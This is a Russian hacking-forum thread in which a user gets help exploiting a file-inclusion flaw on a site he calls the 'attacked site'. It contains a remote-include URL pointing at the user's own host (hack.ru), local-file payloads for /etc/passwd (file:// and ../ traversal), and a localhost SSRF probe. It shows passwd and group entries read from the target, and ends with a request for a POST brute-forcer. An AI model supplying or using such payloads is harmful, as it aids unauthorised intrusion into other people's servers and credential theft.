Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   File include[помощь] (https://forum.antichat.xyz/showthread.php?t=443053)

sinfo 11.10.2016 20:01

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).

BabaDook 11.10.2016 20:05

Цитата:

Сообщение от sinfo
sinfo said:

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).

Так и должно быть.. Ну не совсем может там не инклуд вовсе

sinfo 11.10.2016 20:07

Цитата:

Сообщение от BabaDook
BabaDook said:

Так и должно быть

Ну а как мне увидить phpinfo атакуемого сайта?

t0ma5 11.10.2016 20:15

Цитата:

Сообщение от sinfo
sinfo said:

Ну а как мне увидить phpinfo атакуемого сайта?

а зачем тебе phpinfo атакуемого сайта?

вопрос вообще про инклуд сначала был

/etc/shells /etc/passwd по классике попробуй проинклудить

BabaDook 11.10.2016 20:46

Цитата:

Сообщение от t0ma5
t0ma5 said:

а зачем тебе phpinfo атакуемого сайта?
вопрос вообще про инклуд сначала был
/etc/shells /etc/passwd по классике попробуй проинклудить

Так если у него инклуд нахрена это всё,тем более если РФИ

BabaDook 11.10.2016 20:47

site.com/blablabla=

Цитата:

Сообщение от sinfo
sinfo said:

Ну а как мне увидить phpinfo атакуемого сайта?

site=i.txt

в i.txt

а что если, file:///etc/passwd || http://127.0.0.1:80

sinfo 11.10.2016 21:18

Цитата:

Сообщение от BabaDook
BabaDook said:

site.com/blablabla=
site=i.txt
в i.txt
а что если, file:///etc/passwd ||
http://127.0.0.1:80

в i.txt - открыл как текстовый тхт.

file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((

BabaDook 11.10.2016 21:35

Цитата:

Сообщение от sinfo
sinfo said:

в i.txt - открыл как текстовый тхт.
file:///etc/passwd ||
http://127.0.0.1:80
- нет результатов(((

тогда это не инклуд

strelok20094 11.10.2016 23:01

так ты файл читать можешь локальный?

file:///etc/passwd

/blablabla=../etc/passwd

sinfo 12.10.2016 00:47

file:///etc/passwd да вот только что нашел,ток в другом месте

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

/etc/group

crontab:x:102:

Debian-exim:x:103:

mlocate:x:104:

ssh:x:105:

А есть брут??работающий с post запросами?


Время: 10:34